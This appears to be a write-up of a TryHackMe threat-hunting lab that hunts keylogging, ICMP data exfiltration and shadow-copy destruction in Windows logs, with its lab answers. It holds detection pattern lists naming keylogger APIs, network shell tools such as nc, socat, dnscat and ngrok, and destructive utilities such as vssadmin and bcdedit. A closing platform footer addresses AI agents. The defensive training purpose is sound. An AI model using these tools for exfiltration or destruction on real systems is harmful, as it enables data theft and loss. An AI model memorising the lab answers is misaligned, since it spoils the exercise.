# Threat Hunting: Endgame

## Threat Hunting: Endgame

In this room, you will learn how to implement the threat hunting process to hunt malicious activities performed in the "Actions on Objectives" phase of the "Cyber Kill Chain". You will also experience the hunting process of commonly used MITRE ATT\&CK techniques under the collection, exfiltration and impact tactics. The ultimate objective of the room is to teach how to conduct a threat hunting investigation to detect attackers' main objectives in the system.

Learning Objectives

* Gain applied hands-on threat hunting investigation skills.
* Familiarise yourself with the "Actions on Objectives" phase.
* Familiarise yourself with correlating and evaluating artefacts for a hypothesis.
* Experience the threat hunting process for a defined scope.

Room Prerequisites

* [Windows Event Logs](https://tryhackme.com/room/windowseventlogs)
* Windows Forensics [1](https://tryhackme.com/room/windowsforensics1) & [2](https://tryhackme.com/room/windowsforensics2)
* [Core Windows Processes](https://tryhackme.com/room/btwindowsinternals)
* [Sysmon](https://tryhackme.com/room/sysmon)
* [Sysinternals](https://tryhackme.com/room/btsysinternalssg)
* [MITRE](https://tryhackme.com/room/mitre)
* [Threat Emulation Module](https://tryhackme.com/module/threat-hunting)

## Toolset and Hints

**Case: Collection**

Threat hunting exercise focused on TA0009 (also known as a collection). The case example covers hunting keylogger activity.

* Available log sources 
  * Security
  * Sysmon
  * Windows PowerShell
  * PowerShell Operational

**Case: Exfiltration**

Threat hunting exercise focused on TA0010 (also known as exfiltration). The case example covers hunting data exfiltration over ICMP.

* Available log sources 
  * Security
  * Sysmon
  * Windows PowerShell
  * PowerShell Operational

**Case: Impact**

Threat hunting exercise focused on TA0040 (also known as impact). The case example covers hunting data destruction and manipulation via native system resources.

* Available log sources 
  * Security
  * Sysmon
  * System
  * Windows PowerShell
  * PowerShell Operational

## Tactic: Collection

#### Tactic: Collection

The collection tactic (also known as TA0009) is a set of techniques used (or could be used) by adversaries to gather valuable data from the target system that could be useful for their objectives. As the target data is directly linked with the adversary's objectives, it is not always possible to identify which data type is significantly at risk. However, there are a few commonly acquired data sources that should be considered during threat hunting:

* Data that can be used for exploitation, pivoting, privilege escalation.
* Data can be used for intelligence gathering.
* Data can be monetised.
* Data includes confidential, financial records, intellectual property, and personally identifiable information (PII).

#### Commonly used techniques are listed below:

* Man-in-the-middle
* ARP / LLMNR Poisoning
* SMB Relay
* DHCP Spoofing
* Hijacking
* Traffic dump
* Keylogging
* Input capture
* Data collection from local/cloud/repositories

The table below summarises the collection tactic (also known as TA0009).

<table data-header-hidden><thead><tr><th width="227"></th><th></th></tr></thead><tbody><tr><td>Importance<br></td><td>The actions carried out under this tactic will help the analyst understand the adversary's motivation and plans for the next steps. Focusing on this aspect could enable early detection of full compromise or impact on/over valuable data/assets.<br></td></tr><tr><td>Link to Other Tactics</td><td><p>The collection tactic is seen to be used with the following tactics:</p><ul><li>Initial Access</li><li>Lateral Movement</li><li>Exfiltration</li><li>Impact</li></ul></td></tr><tr><td>Suggestions and Best Practices Against TA0009<br></td><td><p>The following points will help security teams enhance the overall system's resilience and help threat hunters conduct more efficient and proactive hunting.<br></p><ul><li>Develop data asset inventory of valuable/sensitive data, track access controls, and audit asset/file actions.<br></li><li>Set up a continuous endpoint and network monitoring solution and configure audit logs accordingly.</li><li>Track user and account activities to identify unusual user activities.</li><li>Use DLP and UBA solutions.</li></ul></td></tr></tbody></table>

### Case Example: Hunting Keylogging

This case example demonstrates a hunting exercise for keylogger hunting. The mini scenario is hunting a keylogger activity triggered by an abused administrative account or an attacker who gains an administrative shell session. Note that the pre and post-activities are not within the scope of this hunt; the case example is directly focused on detecting keylogging activity.

Let's skim over the essential points with the "how things are working" mindset to start hunting keyloggers.

Keyloggers (also known as keystroke loggers) are tools/utilities that record all performed keyboard activities. Most common forms are implemented with direct API calls, registry modifiers, malicious driver files, customised scripts and function calls, and packed executables. Most modern security tools can detect keylogger patterns, but the ability to manually hunt malicious patterns is vital to survive on the battlefield of threat hunting.

Note that there are various procedures for implementing keylogger and detecting it. In this case, we are hunting one of the common forms of the keylogger activities: API Execution. The below table summarises the main characteristics of the keystroke logging approach for the given case.

<table><thead><tr><th width="257">Keystroke Log Approach</th><th>Procedure and Example</th></tr></thead><tbody><tr><td>Windows API Execution</td><td><p>Keylogging with API and function calls and common calls are listed below:</p><ul><li>GetKeyboardState</li><li>SetWindowsHook</li><li>GetKeyState</li><li>GetAsynKeyState</li><li>VirtualKey</li><li>vKey</li><li>filesCreated<br></li><li>DrawText</li></ul></td></tr><tr><td>Hooks</td><td><p>Keylogging with low-level hooks common hooks are listed below:<br></p><ul><li>SetWindowHookEx</li><li>WH_KEYBOARD</li><li>WH_KEYBOARD_LL</li><li>WH_MOUSE_LL</li><li>WH_GETMESSAGE</li></ul></td></tr></tbody></table>

#### Base Hints

Case Index = `case_collection`

Filtering fields to investigate specific log types:

* `winlog.channel`
* `winlog.provider_name`

Starting with the given scenario and information, we will use overall search insights on process executions and pattern matches. Our hypothesis is clear; we look for keylogging actions on the given pattern scope. We will quickly check if any of the available log files have a match with any of the given patterns by using the following KQL query:

`*GetKeyboardState* or *SetWindowsHook* or *GetKeyState* or *GetAsynKeyState* or *VirtualKey* or *vKey* or *filesCreated* or *DrawText*`

<figure><img src="/files/26jHxBAtwyEDojEl1AGY" alt=""><figcaption></figcaption></figure>

Based on the results, it can be seen that there are multiple pattern matches in the given index. Implementing a quick filter also shows that the main visibility is coming from the following log file:

* `Microsoft-Windows-PowerShell/Operational`

Adding column filters shows the file contains the suspicious patterns.

* Selected columns:
  * `winlog.channel`
  * `winlog.event_data.Path`
  * `winlog.event_data.ScriptBlockText`

<figure><img src="/files/fISSAvFuXP5iGhCPPnRF" alt=""><figcaption></figcaption></figure>

Now we have the suspicious file name executed code block, which gives another suspicious file name, so let's dig deeper to understand the linked activities with the discovered files by using the following query:

* `*chrome-update_api.ps1* or *chrome_local_profile.db*`

Note that we set the following columns to increase visibility:

* `winlog.channel`
* `winlog.event_data.Path`
* `winlog.event_data.ScriptBlockText`
* `winlog.event_data.CommandLine`
* `winlog.event_data.Data.#text`

<figure><img src="/files/EQY9Q1Wv1xoiKnfs1lk6" alt=""><figcaption></figcaption></figure>

The previous results show that the suspicious PowerShell file is downloaded using the 'wget' command and executed by the user. The executed file is a script; the details are visible in the applied columns. Based on the visible script lines, we can see that the second suspicious file is the keylogger's database. Let's dig deeper to find out more details about the database file using the following query:

* `winlog.event_data.ScriptBlockText : "*chrome_local_profile.db*"`

Updating the column filters to increase visibility:

* `winlog.event_data.Path`
* `winlog.event_data.ScriptBlockText`
* `winlog.event_data.Payload`

<figure><img src="/files/EECgQteTRqXhsDFQeRhz" alt=""><figcaption></figcaption></figure>

This result gives more insight into the database file. The 'cat' command is used to list/view the contents of files, so it may be possible to see the contents of the database file and discover the logged keystrokes. &#x20;

At this point, the findings could be used to build a search chain correlating the parent-child relationship of process executions to gain more insight into the suspicious script and database file. Similarly, focusing on the command execution time and digging into the following events using the `View surrounding documents` option will provide a similar option.&#x20;

Required steps to do so:

* Click the upper left arrow to expand the details of the log/event.
* Click on the "View surrounding documents" link/button.

<figure><img src="/files/0sssT0yDnglYnhXB74LM" alt=""><figcaption></figcaption></figure>

This option creates a list showing the events in chronological order. Click on the `Load 5 newer documents` link/button to follow the events after the cat command has been executed. Note that the event you clicked on will be highlighted in light blue as the starting point for your search.

<figure><img src="/files/0GE3trdX9RBm1yLCNji0" alt=""><figcaption></figcaption></figure>

We expected to have a copy of the command results on the terminal, as the command output is not redirected to any file or address. That's why we focused on the executed command, time and payload details. Now, the contents of the keylogger database are fully visible!

### Conclusion

Based on the results, there are multiple activities, including Chrome, PowerShell, Notepad and other system programs. After investigating the results carefully, we notice that PowerShell starts a process that leads to child processes, which downloads the malicious script from a remote host, logs the keystrokes and creates a database file in the system.

This is the simplest way of hunting keylogger activity with a given pattern set. Still, you should keep track of the detected files and processes to identify the relations between them, create a timeline and discover the logged/stolen data.

Suggestions on where to look and what to do next:

* File creation activities to detect when and how the malicious PowerShell script is created.
* Process relations to understand the start point of the adversary activity.
* Function calls to understand if the adversary opens or transfers the dump database.

### Q & A

1\) What is the Process ID of the process that downloads the malicious script?

```
*GetKeyboardState* or *SetWindowsHook* or *GetKeyState* or *GetAsynKeyState* or *VirtualKey* or *vKey* or *filesCreated* or *DrawText*
```

<figure><img src="/files/SEvyc44rpEkBa4KUECg9" alt=""><figcaption></figcaption></figure>

```
*chrome-update_api.ps1* or *chrome_local_profile.db*
```

<figure><img src="/files/AWQ5iQGmNGAFyzdjX6hA" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/XYCBDOdetN4j6nMSOXL4" alt=""><figcaption></figcaption></figure>

Answer: 3388

2\) What is the logged mail account?

```
*chrome-update_api.ps1* or *chrome_local_profile.db*
```

<figure><img src="/files/nu3BG2C3KBWEGhxCTM8M" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/EyQfG5XvCbcT1Y3ZDbfc" alt=""><figcaption></figcaption></figure>

Answer:  <hunted-victim2323@gmail.com>

## Tactic: Exfiltration

#### Tactic: Exfiltration

The exfiltration tactic (also known as TA0010) is a set of techniques used (or could be used) by adversaries to steal or leak data from the target system/network. As the utmost aim of the tactic is to steal/leak data, the compression and encryption techniques also appear here. Compression and encryption are usually used to gather the maximum amount of data possible and avoid detection. The common forms of appearance of the tactic are listed below:

* Sending data out to command and control servers/channels.
* Sending data out to alternative channels by using size limits on transmission.

Commonly used techniques are listed below:

* Traffic Duplication
* Data transfer over alternative protocols
* Data transfer over encrypted/unencrypted C2 Channel
* Exfiltration over web service and cloud storage mediums
* Exfiltration over Bluetooth and portable devices

Note that the mentioned exfiltration techniques could be triggered by automation or scheduled jobs. The table below summarises the exfiltration tactic (also known as TA00010).<br>

<table data-header-hidden><thead><tr><th width="144"></th><th></th></tr></thead><tbody><tr><td>Importance<br></td><td>The actions carried out under this tactic highlight the lost or compromised data (data breach). Hunting and understanding the details of this phase of the attack chain will help security teams detect the weaknesses and gaps in the implemented security measures. Also, understanding how the data is exfiltrated is vital to mitigate and enhance the detection/prevention ability of the system against similar data breach attempts.<br></td></tr><tr><td>Link to Other Tactics</td><td><p>As the tactic is the accomplished action on the target system and the consequence of the successful attack, it can be considered in the last part of the attack chain. Therefore, the hunter should consider the previous steps, which usually start with the following:</p><ul><li>initial access</li><li>persistence</li><li>privilege escalation and other relevant tactics required to inflict the present damage.</li></ul></td></tr><tr><td>Suggestions and Best Practices Against TA0010<br></td><td><p>The following points will help security teams enhance the overall system's resilience and help threat hunters conduct more efficient and proactive hunting.</p><ul><li>Data classification and access controls.</li><li>Improve monitoring and use of DLP solutions.</li><li>Implement data encryption for sensitive data.</li></ul></td></tr></tbody></table>

### Case Example: Data Exfiltration over ICMP

This case example demonstrates a hunting exercise for data exfiltration over ICMP. The mini scenario is hunting data exfiltration over the ICMP traffic channel by focusing on pure Windows artefacts. Note that, this time, we focus on system and processes instead of network traffic to get an insight into the event and learn the changes that occur at the system/process level during data exfiltration.

Note that there are various procedures for implementing exfiltration and detecting it. Typically, adversaries system native or their own command and control channel with controlled size limits to transmit/exfiltrate data. Sometimes, adversaries implement two stages of exfiltration by transferring the data to an alternative network location over an unencrypted protocol before transferring it to their dedicated and encrypted command and control channel. Network IDS and IPS solutions provide incredible details on detecting such activities. Again, understanding the system-level processes of the scripted action is a big plus. The table below summarises the main characteristics of the common data exfiltration approach for the given case.

<table data-header-hidden><thead><tr><th width="301"></th><th></th></tr></thead><tbody><tr><td>Exfiltration Approach</td><td>Procedure and Example</td></tr><tr><td>Scripting with system tools and utilities</td><td><p>Command execution and file access activities,  common calls are listed below:</p><ul><li>ping, ipconfig, arp, route, telnet</li><li>tracert, nslookup, netstat, netsh</li><li>localhost, host, smb, smtp,scp, ssh,</li><li>wget, curl, certutil, net use,</li><li>nc, ncat, netcut, socat, dnscat, ngrok</li><li>psfile, psping</li><li>tcpvcon, tftp, socks,</li><li>Invoke-WebRequest, server, http, post, ssl, encod, chunk, ssl</li></ul></td></tr></tbody></table>

#### Base Hints

Case Index = `case_exfiltration`

Filtering fields to investigate specific log types:

* `winlog.channel`
* `winlog.provider_name`

Starting with the given scenario and information, we will use overall search insights on process executions and pattern matches. Our hypothesis is clear: we are looking for a system tool call that leads to data transfer. We will quickly check if any of the given log files have a match with any of the given patterns by using the following KQL query:

`*$ping* or *$ipconfig* or *$arp* or *$route* or *$telnet* or *$tracert* or *$nslookup* or *$netstat* or *$netsh* or *$smb* or *$smtp* or *$scp* or *$ssh* or *$wget* or *$curl* or *$certutil* or *$nc* or *$ncat* or *$netcut* or *$socat* or *$dnscat* or *$ngrok* or *$psfile* or *$psping* or *$tcpvcon* or *$tftp* or *$socks* or *$Invoke-WebRequest* or *$server* or *$post* or *$ssl* or *$encod* or *$chunk* or *$ssl*`

<figure><img src="/files/ZeWsPafQZkEIzmSECbFG" alt=""><figcaption></figcaption></figure>

There is one hit! Now, let's continue hunting with the detected system call by running this filter:

* `*System.Net.Networkinformation.ping*`

Note that we filtered the following column to reveal if any executable file is involved in the suspicious activity:

* `winlog.event_data.Path`

<figure><img src="/files/NDJ9aHlRtRIGvcGlwAsO" alt=""><figcaption></figcaption></figure>

The result shows a suspicious PowerShell script. Expand the log and look at the details. This script is transferring files using ICMP packets. In other words, it is a data exfiltration script!

Using the `View Surrounding Documents` option might give a good insight into the script, but let's run the following query to see all associated activity.&#x20;

* `*icmp4data.ps1*`

Updating the column filters to increase visibility:

* `winlog.event_data.Path`
* `winlog.event_data.ScriptBlockText`

<figure><img src="/files/5zorop3dtZRmlPiLCHa3" alt=""><figcaption></figcaption></figure>

The query returns precise results to end the hunt by identifying the exfiltrating script, the exfiltrated file and the upload server!

### Conclusion

Based on the results, it can be seen that the discovered script is used for exfiltrating data over ICMP protocol. Unlike the previous hunt, no prior indicator of downloading the exfiltration script exists. It is most likely created by the adversary or planted with a different technique.

This is the simplest way of hunting data exfiltration with system native tools over unencrypted channels. Still, you should investigate the query results to deepen and enrich your findings. Identify how the script works and which data is exfiltrated.

**Suggestions on where to look and what to do next:**

* Exfiltration script analysis (how it works).
* Exfiltration destination.
* Connections made to the exfiltration destination.

### Q & A

1\) What is the total number of sent ICMP packets?

```
*$ping* or *$ipconfig* or *$arp* or *$route* or *$telnet* or *$tracert* or *$nslookup* or *$netstat* or *$netsh* or *$smb* or *$smtp* or *$scp* or *$ssh* or *$wget* or *$curl* or *$certutil* or *$nc* or *$ncat* or *$netcut* or *$socat* or *$dnscat* or *$ngrok* or *$psfile* or *$psping* or *$tcpvcon* or *$tftp* or *$socks* or *$Invoke-WebRequest* or *$server* or *$post* or *$ssl* or *$encod* or *$chunk* or *$ssl*
```

<figure><img src="/files/1IbaIxTGqt8k5NDFTjBe" alt=""><figcaption></figcaption></figure>

```
*System.Net.Networkinformation.ping*
```

<figure><img src="/files/BAgal1Rua1GF0bGno8dK" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/GSJ9MDkcNdIA4MwNQCer" alt=""><figcaption></figcaption></figure>

Answer:  21

2\) How many bytes (chunk) is the amount of data carried in each packet?

```
*icmp4data.ps1*
```

<figure><img src="/files/fvNi5Usk9bGhKnxgbx1f" alt=""><figcaption></figcaption></figure>

Answer:  15

3\) What is the name of the exfiltrated document?

<figure><img src="/files/9tgXCjSsFgP0eQgabSBl" alt=""><figcaption></figcaption></figure>

Answer:  chrome\_local\_profile.db

4\) Answer:  10\[.]10\[.]87\[.]116

## Tactic: Impact

The Impact tactic (also known as TA0040) is a set of techniques used (or could be used) by adversaries to disrupt the availability, hinder the expected functionality and compromise integrity by accomplishing a set of procedures with a manner of data destruction/disruption/manipulation. Since each adversary has different purposes, a hunter should always consider as much as possibilities over valuable data or system resources. Sometimes, adversaries alter the data and make all processes look fine during exploitation. Therefore, hunting the impact part of the attack chain requires excellent attention to find the needle in the haystack. The common forms of appearance of the tactic are listed below.

* Ransomware
* File destruction and removal
* Data manipulation

Commonly used techniques are listed below:

* Interrupting system environment by modifying primary settings
  * Account manipulation
  * Access manipulation
  * Network configuration
* Data destruction, disruption and manipulation
* Data encryption
* Defacement
* Service destruction

The table below summarises the impact tactic (also known as TA0040).<br>

<table data-header-hidden><thead><tr><th width="182"></th><th></th></tr></thead><tbody><tr><td>Importance<br></td><td>The actions carried out under this tactic are consequences of the successful attack. Hunting and understanding the details of this phase of the attack chain will help security teams detect the weaknesses and gaps in the implemented security measures. Understanding this phase is vital to mitigate the risks and enhance the detection/prevention ability of the system against similar threats.<br></td></tr><tr><td>Link to Other Tactics</td><td>Like the exfiltration tactic, the impact tactic can be considered in the last part of the attack chain. So, considering the previous steps and creating use case examples after the hunt is essential.</td></tr><tr><td>Suggestions and Best Practices Against TA0040<br></td><td><p>The following points will help security teams enhance the overall system's resilience and help threat hunters conduct more efficient and proactive hunting.</p><ul><li>Conduct regular risk assessments, threat hunting and penetration testing.</li><li>Implement in-depth hardening and zero-trust model (where possible).</li><li>Improve the visibility and monitoring.</li><li>Prepare and implement incident response and disaster recovery plans.</li></ul></td></tr></tbody></table>

### Case Example: Data Disruption/Manipulation

This example demonstrates a hunting exercise for data destruction and recovery manipulation over native system processes. The mini scenario is hunting shadow backup removal and system recovery point corruption, the same as the Olympic Destroyer APT group does.&#x20;

Note that there are various procedures for implementing system disruption/manipulation and detecting it. Typically, adversaries use native system utilities to evade the security products and stay undetected. While ransomware is one of the first things that comes to mind, it is not always used for indirect long-term system disruption goals. Therefore, the silent evil goals could be accepted as less visible but have a similar impact. The table below summarises the main characteristics of the common data disruption approach for the given case.

<table data-header-hidden><thead><tr><th width="257"></th><th></th></tr></thead><tbody><tr><td>Exfiltration Approach</td><td>Procedure and Example</td></tr><tr><td>Scripting with system tools and utilities</td><td><p>Command execution and file access activities,  common calls are listed below:</p><ul><li>del, rm</li><li>vssadmin, wbadmin</li><li>bcdedit, wevutil</li><li>shadow, recovery, bootstatuspolicy</li></ul></td></tr></tbody></table>

#### Base Hints

Case Index = `case_impact`

Filtering fields to investigate specific log types:

* `winlog.channel`
* `winlog.provider_name`

Starting with the given scenario and information, we will use overall search insights on process executions and pattern matches. Our hypothesis is clear: We are looking for a system tool call that leads to system disruption and data manipulation. We will quickly check if any of the given log files match with any of the given patterns by using the following KQL query:

`*del* or *rm* or *vssadmin* or *wbadmin* or *bcdedit* or *wevutil* or *shadow* *recovery* or *bootstatuspolicy*`

<figure><img src="/files/ywXc3264FqsI8mQiKAjr" alt=""><figcaption></figcaption></figure>

Results are challenging to gain insight into. Let's visualise by log sources and decide where to focus first.

* Click on the following field and choose the visualise option:
  * `winlog.channel`
* Then, select the table format.

<figure><img src="/files/MucCvhlWt3PFzX9VaB7k" alt=""><figcaption></figcaption></figure>

As we are looking for system native tools, the Security log could provide the low-hanging fruit. Let's return to our main filter and add the Security log as a log source filter.

<figure><img src="/files/sz5jOG3ZFPY56w34vlid" alt=""><figcaption></figcaption></figure>

The time field can help us highlight the first command executed. However, we still need to identify the actual starting point of the action. Let's focus on the first suspicious event by filtering the Event ID without narrowing the search with log sources.

* `winlog.event_data.ProcessId : "1972"`

Updating the column filters to increase visibility:

* `winlog.event_data.CommandLine`
* `winlog.event_data.ParentProcessName`
* `winlog.event_data.ProcessId`
* `winlog.event_data.ParentProcessId`
* `winlog.event_data.ParentImage`

This query provides results that are clear enough to explore and correlate the parent-child process relationship. So, the parent process is found and visible with all the nested details you need!

### Conclusion

Based on the results, it can be seen that the revealed actions are targeted to disrupt the system by removing shadow copies and destroying the system recovery point/service.

This is the simplest way of hunting data system data manipulation with native system tools/utilities. Still, you should investigate the query results to deepen and enrich your findings.

Suggestions on where to look and what to do next:

* Discovering the primary process that launched the subprocess to do planned adversary actions.
* Identifying the chained PowerShell and CommandShell executions.

### Q & A

1\) What is the name of the system executable used to remove shadow copies?

```
*del* or *rm* or *vssadmin* or *wbadmin* or *bcdedit* or *wevutil* or *shadow* *recovery* or *bootstatuspolicy*
```

<figure><img src="/files/SieY9idxWY5vO7q2ilGt" alt=""><figcaption></figcaption></figure>

Answer:  vssadmin.exe

2\) What is the main shell image that started the attack chain?

```
*del* or *rm* or *vssadmin* or *wbadmin* or *bcdedit* or *wevutil* or *shadow* *recovery* or *bootstatuspolicy*
```

<figure><img src="/files/98UjOoJdFOgiODEcJC5G" alt=""><figcaption></figcaption></figure>

```
winlog.event_data.ProcessId : "1972"
```

<figure><img src="/files/WpSRKXj9LUU6C5ZwwFMc" alt=""><figcaption></figcaption></figure>

Answer:  powershell.exe

3\) What is the process ID that started the attack chain?

Answer:  6512

## Conclusion

Congratulations! You have completed hunting three different MITRE ATT\&CK tactics. To conclude the room, let's summarise the hunting methodologies we discussed thoroughly.

<table><thead><tr><th width="157">Tactic</th><th>Hunting Methodology</th></tr></thead><tbody><tr><td>Collection</td><td><ul><li>Implement baselining and monitor file changes.</li><li>Monitor network traffic data spikes and anomalies.</li><li>Monitor driver installations.</li><li>Monitor process and registry activities.</li></ul></td></tr><tr><td>Exfiltration</td><td><ul><li>Monitor command executions.</li><li>Monitor file access.</li><li>Monitor network traffic data.</li></ul></td></tr><tr><td>Impact</td><td><ul><li>Monitor command executions.</li><li>Monitor file modification and deletion.</li><li>Monitor snapshot, volume, drive and image load, access and deletion.</li><li>Monitor AS API execution.</li></ul></td></tr></tbody></table>

The list below will help you create a proactive hunting ability and a more resilient attack surface.

* Learn your environment scope, components and expected activity patterns.
* Implement a continuous monitoring solution to improve visibility.
* Implement behavioural analysis and threat intelligence solutions.
* Plan and practice threat hunting, purple teaming and incident response drills.

This room covered ways to hunt suspicious activities related to actions on objectives within a compromised host. Once the threat actors and adversaries successfully compromise a host, they accomplish their actions on objectives after gaining enough resources from the previous attack steps. This room presents an interactive environment to exercise some common actions on objective procedures implemented by adversaries.


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://faresbltagy.gitbook.io/footprintinglabs/tryhackme-soc-2/threat-hunting/threat-hunting-endgame.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.